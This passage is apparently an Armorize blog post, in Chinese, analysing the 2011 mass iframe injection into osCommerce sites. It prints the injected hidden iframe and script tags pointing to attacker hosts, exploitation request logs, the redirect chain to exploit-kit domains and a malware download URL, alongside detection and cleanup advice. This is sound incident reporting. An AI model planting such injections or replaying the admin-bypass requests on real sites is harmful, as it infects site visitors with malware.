href="http://www.crn.com/news/security/231002947/iframe-attack-infects-more-than-300-000-oscommerce-sites.htm">iFrame Attack Infects More Than 300,000 osCommerce Sites</a>, July 29, 2011</p><p>Rockefeller News: <a href="http://www.rockefellernews.com/22737/websites-programmed-by-open-source-software-attacked-by-malware/">Websites Programmed By Open Source Software Attacked By Malware</a>, July 29, 2011</p><p>PC World: <a href="http://www.pcworld.idg.com.au/article/395304/e-commerce_sites_based_open_source_code_under_attack">E-commerce sites based on open source code under attack</a>, July 29, 2011</p><p>Practical Ecommerce: <a href="http://www.practicalecommerce.com/blogs/post/864-osCommerce-2-2-Websites-Targeted-by-Mass-Injection-Attack-143-000-Pages-Hit">osCommerce 2.2 Websites Targeted by Mass Injection Attack, 143,000 Pages Hit</a>, July 28, 2011</p><p>The Wall Street Journal: <a href="http://onespot.wsj.com/technology/2011/07/28/ecd52/e-commerce-sites-based-on-open-source">E-commerce sites based on open source code under attack</a>, July 28, 2011</p><p>CIO: <a href="http://www.cio.com/article/686844/E_Commerce_Sites_Based_on_Open_Source_Code_Under_Attack">E-Commerce Sites Based on Open Source Code Under Attack</a>, July 28, 2011</p><p>CSO Online: <a href="http://www.csoonline.com/article/686829/e-commerce-sites-based-on-open-source-code-under-attack">E-Commerce Sites Based on Open Source Code Under Attack</a>, July 28, 2011</p><p>InfoWorld: <a href="http://www.infoworld.com/d/security/os-commerce-based-sites-under-attack-168317">OS Commerce-based sites under attack</a>, July 28, 2011</p><p>Network World: <a href="http://www.networkworld.com/news/2011/072811-ecommerce-attack.html?hpg1=bn">E-commerce sites based on open source code under attack</a>, July 28, 2011</p><p>Computer World: <a href="http://news.idg.no/cw/art.cfm?id=70861390-1A64-6A71-CE7EBE27E1012273">E-commerce sites based on open source code under attack</a>, July 28, 2011</p><p>ZDNet: <a href="http://www.zdnet.com/blog/security/90000-pages-compromised-in-mass-iframe-injection-attack/9116" target="_blank">90,000+ pages compromised in mass iFrame injection attack</a>, July 28 2011</p><p>Security News: <a href="http://www.securitynewsdaily.com/massive-iframe-attack-hits-90000-web-pages-0997/">Massive Browser Attack Hits 90,000 Web Pages</a>, July 26, 2011</p><p>CSO Online: <a href="http://blogs.csoonline.com/1615/drive_by_download_infects_more_than_90_000_sites_armorize_warns" target="_blank">Drive-by download infects more than 90,000 sites, Armorize warns</a>, July 26 2011</p><p>Help Net Security: <a href="http://www.net-security.org/secworld.php?id=11350" target="_blank">90,000+ web pages compromised through iFrame injection</a>, July 26 2011</p><p>Threat Post: <a href="http://threatpost.com/en_us/blogs/massive-iframe-attack-hits-more-90000-pages-072611" target="_blank">Massive iFrame Attack Hits More than 90,000 Pages</a>, July 26 2011</p><p>Reuters: <a href="http://www.reuters.com/article/2011/07/25/tagblogsfindlawcom2011-freeenterprise-idUS328539989820110725" target="_blank">Cyberattacks Now Targeting Small Business</a>, July 24 2011</p><p>CSO Online: <a href="http://blogs.csoonline.com/1586/openx_hack_beware_of_personal_shield_pro" target="_blank">OpenX hack: Beware of Personal Shield Pro</a>, July 08 2011</p><p>USA Today: <a href="http://www.usatoday.com/tech/news/2011-07-04-small-business-cyber-attackss_n.htm" target="_blank"> New cyberattacks target small businesses</a>, July 04 2011</p><br />
<b><a name="openings">[徵求人才]</a></b><br />
<br />
若對我們的工作內容有興趣,麻煩直接將履歷寄給我 Wayne (wayne@armorize.com),或HR Tina (tina@armorize.com)。如有任何問題,也歡迎來信詢問。感謝大家!<br />
<br />
<b>工程部</b><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=454b44285b37405732333b64352f376085f714429575d3f22222222203b3c2726472j53&jobsource=n104bank_near&hotjob_chr=&jobact=appear_time">資深軟體工程師/Senior Software Developer (HackAlert Team) </a><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=5e4a44253c463f5631323a63342e365f25e704328565c3e2121212165382b2625381j01&jobsource=n104bank_near&hotjob_chr=&jobact=appear_time">資深PHP工程師 / Senior PHP Developer (HackAlert Team)</a><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=4961436c4937405732333b64352f376085f714429575d3f22222222653b3c2726472j57&jobsource=n104bank_near&hotjob_chr=&jobact=appear_time">Senior QA Engineer/QA Engineer (CodeSecure Team)</a><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=413b45295b37405732333b64352f376085f714429575d3f222222221f3b3c2726472j49&jobsource=n104bank_near&hotjob_chr=&jobact=appear_time">資深Java工程師/Senior JAVA Developer (CodeSecure Team) </a><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=444e48294c3a435a35363e6738323a6316274472c5a604225252525253d552a29745j52&intro=1&jobsource=checkc&page=1">Web Frontend 工程師</a><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=5650482e4a4c455c373840693a343c6536476492e5c624427272727273f312c2b826j54&intro=1&jobsource=checkc&page=1">滲透測試專家</a><br />
<br />
Android 資安工程師 (來信詢問工作內容 wayne@armorize.com)<br />
惡意程式分析工程師 (來信詢問工作內容 wayne@armorize.com)<br />
<br />
<b>行銷部</b><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=3b73452a3b49425934353d663731396206173462b595f4124242424683c642928654j98&jobsource=n104bank_near&hotjob_chr=&jobact=appear_time">網頁設計工程師/ Senior Web Engineer</a><br />
<br />
<b>業務部</b><br />
<br />
<a href="http://www.104.com.tw/jobbank/cust_job/job.cfm?j=384a44245a363f5631323a63342e365f25e704328565c3e2121212121382b2625381j56&intro=1&jobsource=intr&page=1">資安顧問 Security Consultant</a>Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-1441759431140700676.post-56598410401520939792011-08-19T11:04:00.000+08:002011-08-19T11:04:28.310+08:00willysy.com 針對osCommerce網站進行大規模感染,超過八百萬個網頁遭受感染(作者: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Fyodor Yarochkin, Crane Ku)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUOjEtY2So7Urd-UAuQk3fNpneJk_EIAa7ZXDBoSMCz4IefanZDTjmoSfEDP-UkaFJ8P5letTYkIh7lU7IZNKJfv7aTTAS73ftErsJqiAWX-kMkkcFi_FuTcU3AGqS3Uhlw-koiLQtgc/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUOjEtY2So7Urd-UAuQk3fNpneJk_EIAa7ZXDBoSMCz4IefanZDTjmoSfEDP-UkaFJ8P5letTYkIh7lU7IZNKJfv7aTTAS73ftErsJqiAWX-kMkkcFi_FuTcU3AGqS3Uhlw-koiLQtgc/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" /></a></div><b>[大綱]</b><br />
<a href="#summary">1. 摘要</a><br />
<a href="#timeline">2. 攻擊時間表</a><br />
<a href="#source">3. 攻擊來源</a><br />
<a href="#vulnerability">4. 針對的弱點</a><br />
<a href="#what_is_done">5. 受感染網站的症狀</a><br />
<a href="#remediation">6. 檢測及清除</a><br />
<a href="#details">7. 感染細節</a><br />
<a href="#screenshots">8. 相關截圖</a><br />
<a href="#comment">9. 後續補充</a><br />
<span class="fullpost"><br />
<a name="summary"><b>[1. 摘要]</b></a><br />
1. 感染數量: <br />
在8月3日時,Google 的搜尋結果顯示超過了<b><a href="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=%22http://willysy.com/images/banners/%22&hl=en#q=%22http://willysy.com/images/banners/%22&hl=en&prmd=ivns&ei=F-81Tv2iB6_5mAWh3azwCg&start=90&sa=N&bav=on.2,or.r_gc.r_pw.&fp=d31248080af7dd23&biw=734&bih=475">7,690,000 (willysy)</a> + <a href="http://www.google.com/search?q=%22%3Cscript+src%3Dhttp://exero.eu/catalog/jquery.js%22&hl=en&prmd=ivns&ei=LjE6TqP0OMWfmQXtoqC8Bw&start=90&sa=N&biw=814&bih=696">629,000 (exero)</a> = 8,300,000 被感染的網頁 (八百多萬個)</b>。 此數量指的是被感染的網頁數量,並不是指網站或網域。<br />
<br />
2. 感染的iframe如下:<br />
一開始的型式:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre>隨後衍變為:<br />
<pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
3. 攻擊者:<br />
來自烏克蘭的ip: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (都是 AS47694)。Agent 字串: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"<br />
<br />
4. 攻擊目標與相應漏洞:<br />
攻擊目標為有使用 osCommerce 的網站,所使用的漏洞: <a href="http://www.1337day.com/exploits/16505">osCommerce Remote Edit Site Info Vulnerability</a>,<a href="http://www.exploit-db.com/exploits/17285/">osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability</a>,及 <a href="http://www.exploit-db.com/exploits/12801/">Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass</a>。<br />
<br />
5. 所插入的惡意連結中會針對以下漏洞攻擊網站瀏覽者:<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840">CVE-2010-0840</a> -- Java Trust<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188">CVE-2010-0188</a> –- PDF LibTiff<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886">CVE-2010-0886</a> -– Java SMB<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a> -– IE MDAC<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885">CVE-2010-1885</a> – HCP<br />
<br />
6. 執行攻擊碼的網域:<br />
arhyv.ru,counv.ru<br />
註冊日期: July 20th<br />
註冊者: leshkinaira@yahoo.com<br />
IP: 46.16.240.18 (AS51632 烏克蘭 - Inet Ltd)<br />
相關網域: xlamv.ru,vntum.ru<br />
<br />
7. 惡意程式網址:<br />
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot<br />
<br />
<a name="timeline"><b>[2. 攻擊時間表]</b></a><br />
<br />
<b>7月10日</b> -- "Angel Injection" 寫了一篇關於 "osCommerce Remote Edit Site Info Vulnerability" (osCommerce 網站可被遠端編輯資訊之弱點) (<a href="http://www.exploit-id.com/web-applications/oscommerce-remote-edit-site-info-vulnerability">這裡</a>,<a href="http://www.1337day.com/exploits/16505">這裡</a>)。<br />
<br />
<b>7月11日</b> -- 攻擊團隊開始測試該項漏洞。<br />
<pre class="brush: html; auto-links: false">178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
</pre><br />
<b>7月20日</b> -- 攻擊者註冊了 arhyv.ru 及 counv.ru 網域,所使用的email: leshkinaira@yahoo.com<br />
<br />
<b>7月23日</b> -- 針對 "Store Name" 這個變數發動攻擊:<br />
<pre class="brush: html; auto-links: false">178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
</pre><br />
插入的iframe由一開始的:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre>爾後演變為:<br />
<pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
<b>7月24日</b> -- 為我們一開始分析這個事件的時間點,一開始Google顯示只有90,000個網頁被感染:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCFsTrgbPQY4tw6Jk0wN8A-9Mng454Gggjo5dxebzcfgZH-s0JcR9CVzhBmTtvo2oYpg7fCUYHsAs5AfKAi7NIQ_XdB0hfW2y4Ho5ONMD-9lP81p_x9BCgsEbVIjYEA662h1wIyx8rbc/s1600/willysy_drive_by_download_mass_injection_google_ie6_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCFsTrgbPQY4tw6Jk0wN8A-9Mng454Gggjo5dxebzcfgZH-s0JcR9CVzhBmTtvo2oYpg7fCUYHsAs5AfKAi7NIQ_XdB0hfW2y4Ho5ONMD-9lP81p_x9BCgsEbVIjYEA662h1wIyx8rbc/s1600/willysy_drive_by_download_mass_injection_google_ie6_2.png" /></a></div><br />
<b>7月31日</b> -- <a href="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=%22http://willysy.com/images/banners/%22&hl=en#q=%22http://willysy.com/images/banners/%22&hl=en&prmd=ivns&ei=F-81Tv2iB6_5mAWh3azwCg&start=90&sa=N&bav=on.2,or.r_gc.r_pw.&fp=d31248080af7dd23&biw=734&bih=475">Google 顯示</a> 超過 <b>3,410,000 (willysy) + 386,000 (exero) = 3,800,000 (三百多萬) 網頁有遭受感染</b>。<br />
另一方面,Bing <a href="http://www.bing.com/search?q=%22http%3A%2F%2Fwillysy.com%2Fimages%2Fbanners%2F%22&go=&qs=n&sk=&form=QBLH">顯示</a> 有 1,800,000 (一百多萬) 個網頁有被 willysy.com 感染:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicvy-OtezpldW5oHtPsD6mMheGorjvcIt2E1ew-Ln6Nk7avFvntH1JwwoV22hVbavcoeUGfG8g2oGDpOfyyZd9Q-8F1FOElNTh06QFnqh29rx0gcvLketDmfdhlZhEb1XzHQn9vOSpPSE/s1600/willysy_drive_by_download_mass_injection_bing_1_8_million.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicvy-OtezpldW5oHtPsD6mMheGorjvcIt2E1ew-Ln6Nk7avFvntH1JwwoV22hVbavcoeUGfG8g2oGDpOfyyZd9Q-8F1FOElNTh06QFnqh29rx0gcvLketDmfdhlZhEb1XzHQn9vOSpPSE/s1600/willysy_drive_by_download_mass_injection_bing_1_8_million.png" /></a></div><br />
<b>8月3日</b> -- Google 顯示超過了 5,820,000 (willysy) + 497,000 (exero) = 6,300,000 (六百多萬) 的網頁有遭受到感染<br />
<br />
<b>8月7日</b> -- Google 顯示超過了 <b><a href="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=%22http://willysy.com/images/banners/%22&hl=en#q=%22http://willysy.com/images/banners/%22&hl=en&prmd=ivns&ei=F-81Tv2iB6_5mAWh3azwCg&start=90&sa=N&bav=on.2,or.r_gc.r_pw.&fp=d31248080af7dd23&biw=734&bih=475">7,690,000 (willysy)</a> + <a href="http://www.google.com/search?q=%22%3Cscript+src%3Dhttp://exero.eu/catalog/jquery.js%22&hl=en&prmd=ivns&ei=LjE6TqP0OMWfmQXtoqC8Bw&start=90&sa=N&biw=814&bih=696">629,000 (exero)</a> = 8,300,000 (八百多萬) 個網頁遭受感染</b>。<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUOjEtY2So7Urd-UAuQk3fNpneJk_EIAa7ZXDBoSMCz4IefanZDTjmoSfEDP-UkaFJ8P5letTYkIh7lU7IZNKJfv7aTTAS73ftErsJqiAWX-kMkkcFi_FuTcU3AGqS3Uhlw-koiLQtgc/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUOjEtY2So7Urd-UAuQk3fNpneJk_EIAa7ZXDBoSMCz4IefanZDTjmoSfEDP-UkaFJ8P5letTYkIh7lU7IZNKJfv7aTTAS73ftErsJqiAWX-kMkkcFi_FuTcU3AGqS3Uhlw-koiLQtgc/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK_BN5aazmOC4VjpdSF1jUPCArv_KA_TOuyU8S4nwV3CLqPveJlcZhEGAxMmgoIl4mYMkzT8XTO56HEBV4T5xJODrbGfshuNAFyJGWey7MYolHFZ_cBdLRXfSCYz3-5TsJEOYa2nIj1R0/s1600/willysy_mass_oscommerce_infection_exero_600K.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK_BN5aazmOC4VjpdSF1jUPCArv_KA_TOuyU8S4nwV3CLqPveJlcZhEGAxMmgoIl4mYMkzT8XTO56HEBV4T5xJODrbGfshuNAFyJGWey7MYolHFZ_cBdLRXfSCYz3-5TsJEOYa2nIj1R0/s1600/willysy_mass_oscommerce_infection_exero_600K.png" /></a></div><a name="source"><b>[3. 攻擊來源]</b></a><br />
<br />
有許多IPs 已經被認定是這次事件的攻擊者: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (這些都屬於 AS47694)。這些IPs 都來自烏克蘭,且屬於ISP: www.didan.com.ua。<br />
<br />
攻擊者使用了以下的User-Agent 字串:<br />
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)<br />
<br />
如果你有 log 或者其他攻擊來源可以分享的,請連絡我們。(wayne@armorize.com)<br />
<br />
<a name="vulnerability"><b>[4. 針對的弱點]</b></a><br />
<br />
這波攻擊鎖定了使用osCommerce 架設的網站,利用了許多 osCommerce 已知的漏洞,包含: <a href="http://www.1337day.com/exploits/16505">osCommerce Remote Edit Site Info Vulnerability</a> (於 2011/7/10 公開),<a href="http://www.exploit-db.com/exploits/17285/">osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability</a> (於 2011/5/14公開),及 <a href="http://www.exploit-db.com/exploits/12801/">Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass</a> (於2010/5/30 公開)。<br />
<br />
以下為部份 log 樣本:<br />
<pre class="brush: html; auto-links: false">178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
</pre><br />
<a name="what_is_done"><b>[5. 受感染網站的症狀]</b></a><br />
<br />
1. 網站中 osCommerce 的 "Store Name" 變數會被插入以下一種程式碼:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre>2. 攻擊者大部份會留下至少一個 (有時候會更多個) 的後門 (或稱之為 "webshells")。這個在 share hosting 網站上更常發生,因為後門程式可以存取在相同機器上,其他網站的資料:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_mou9wyuWRL1C633uVdmfi6DfTSph9JGAFShKaNQf59tRy2DgGy8ZeB0tNj8RdxSkSvpnD5unhN2i4qqm4MNh3hhietigJxe5c7mnRCd6noHtdoFVot4YVCjolR5DLcfKVu183mKq3kc/s1600/willysy_drive_by_download_mass_injection_backdoor1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_mou9wyuWRL1C633uVdmfi6DfTSph9JGAFShKaNQf59tRy2DgGy8ZeB0tNj8RdxSkSvpnD5unhN2i4qqm4MNh3hhietigJxe5c7mnRCd6noHtdoFVot4YVCjolR5DLcfKVu183mKq3kc/s1600/willysy_drive_by_download_mass_injection_backdoor1.png" /></a></div><br />
<a name="remediation"><b>[6. 檢測及清除]</b></a><br />
<br />
以下為我們建議檢測及清除的流程。如果你有任何疑問或者需要我們幫你檢測,請連絡我們 (wayne@armorize.com)。<br />
<br />
1. 檢查是否受到感染。<br />
<br />
1.1 搜尋 logs 查看有無以下情形:<br />
1.1.1 來自以下IPs的存取: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214。<br />
1.1.2 透過以下 agent 字串進行存取: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)<br />
<br />
1.2 搜尋你的網站查看有無以下程式碼:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
1.3 或者直接透過 <a href="https://hackalert.armorize.com/">HackAlert</a> 幫你進行檢測。<br />
<br />
2. 在你用來管理網站的電腦上安裝防毒軟體。<br />
<br />
3. 找尋及清除存在的後門。<br />
<br />
4. 找尋及清除感染進來的惡意程式碼。<br />
<br />
5. 將你的 osCommerce 升到最新版,同時使用 .htaccess 來保護管理者資料夾。<br />
<br />
6. 更換相關密碼 (包括你的 hosting 管裡介面及osCommerce中管理員的密碼)<br />
<br />
一個很好的文章,教我們如何讓 osCommerce 更安全:(感謝 Markus 提供):<br />
<br />
<a href="http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/">http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/</a><br />
<br />
最新版的 osCommerce 可以在這邊下載:<br />
<br />
<a href="http://www.oscommerce.com/solutions/downloads">http://www.oscommerce.com/solutions/downloads</a><br />
<br />
<a name="details"><b>[7. 感染細節]</b></a><br />
<br />
<a href="http://www.youtube.com/watch?v=okAIMflJ4bA&feature=mfu_in_order&list=UL">這部</a>影片錄下整個感染流程,在我們錄的時候,僅有 90,000 的網頁被感染。<br />
<br />
而以下是我們新錄製的,此時已經有超過六百萬的網頁被感染:<br />
<iframe height="468" width="750" src="http://www.youtube.com/embed/1Jh_H4qQzqo" frameborder="0" allowfullscreen></iframe><br />
1. 受感染的網站被插入以下一種惡意程式碼:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
2. 瀏覽器在載入 http://willysy.com/images/banners/ 時,會重導(http 302)到 http://papucky.eu/ext/<br />
<br />
3. papucky.eu/ext/ 的內容 <a href="http://pastebin.com/E8c6tRsH">在這裡 (pastebin)</a>,會去載入 http://gooqlepics.com/include.js?in=864 裡面的 javascript<br />
<br />
4. <a href="http://pastebin.com/2DrkMR5b">Javascript 在這裡 (pastebin)</a>,<a href="http://pastebin.com/R8HMMQDE">解開混碼後</a>,會產生一個iframe指向:<br />
<br />
http://yandekapi.com/api?in=864<br />
<br />
5. http://yandekapi.com/api?in=864 的內容 <a href="http://pastebin.com/SQUrjeDH">在這裡</a>,會重導到: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV<br />
<br />
6. http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV 的內容 <a href="http://pastebin.com/ttQtvtF2">在這裡</a>,解開混碼後,可以看到<a href="http://pastebin.com/jAPCwSz8">原始攻擊碼</a>,這個攻擊碼同時攻擊了多個漏洞。<br />
<br />
7. 漏洞成功執行後,瀏覽器會下載以下這隻惡意程式並且執行:<br />
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot<br />
<br />
<a name="screenshots"><b>[8. 相關截圖]</b></a><br />
<br />
具有弱點的 osCommerce 網站允許使用者不需要管理者權限就可以存取及修改變數資訊:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr-K5KwUUBjnv1iMlW-hALFkA4dEQW_fJdtrey1zU7X3sW44obEkhaka-SGS8yD5rcNvVKrb9fL9lqRuqt0YHdXvVdq9lEbrhqlIYn3Mp7ZTTYXR6kSnbSbzkzl3FRMhrflHG_Pr7rQFo/s1600/willysy_drive_by_download_mass_injection_oscommerce_vuln1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr-K5KwUUBjnv1iMlW-hALFkA4dEQW_fJdtrey1zU7X3sW44obEkhaka-SGS8yD5rcNvVKrb9fL9lqRuqt0YHdXvVdq9lEbrhqlIYn3Mp7ZTTYXR6kSnbSbzkzl3FRMhrflHG_Pr7rQFo/s1600/willysy_drive_by_download_mass_injection_oscommerce_vuln1.png" /></a></div>以下為部份被攻擊網站的截圖,請注意title的部份,都有被插入惡意程式碼,這是因為 osCommerce 預設會將 STORE_NAME 這個部份做為 title 來進行顯示 (顯示在title部份的惡意程式碼並不會被執行,因為他被當做是title內容來顯示,值得注意的是,這個STORE_NAME並不是只有用在title部份而已,在其他部份的情況下則會被正確執行):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_rXEe0_7X87JcDEPNEOxcbNoEcFDwOe2esEMCGazFNTEduh32WWQEYZ5xAXNvZNcPRiVESTiV78fEFzDnKyUyA3Wd7xooNTHoGlpgpjGBWavmjhR8Z5KLepsYAHGCXuKw7MTz2Tz3yLY/s1600/willysy_oscommerce_hacked_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_rXEe0_7X87JcDEPNEOxcbNoEcFDwOe2esEMCGazFNTEduh32WWQEYZ5xAXNvZNcPRiVESTiV78fEFzDnKyUyA3Wd7xooNTHoGlpgpjGBWavmjhR8Z5KLepsYAHGCXuKw7MTz2Tz3yLY/s1600/willysy_oscommerce_hacked_1.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcdO3Yu0B5cW0tV-OV7Zvsa6F4SDJhBjd5YSe8qVFuOmss3cX2-SaE_sCFyvqXGPaq_WFzv06gbJNjk2NoR2-YV_0kMGfwp7PhH35CskTH4b_RPWiU9ldz733A6eb8J-G2SrCxW2IkZ2g/s1600/willysy_oscommerce_hacked_2.png.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcdO3Yu0B5cW0tV-OV7Zvsa6F4SDJhBjd5YSe8qVFuOmss3cX2-SaE_sCFyvqXGPaq_WFzv06gbJNjk2NoR2-YV_0kMGfwp7PhH35CskTH4b_RPWiU9ldz733A6eb8J-G2SrCxW2IkZ2g/s1600/willysy_oscommerce_hacked_2.png.png" /></a></div><br />
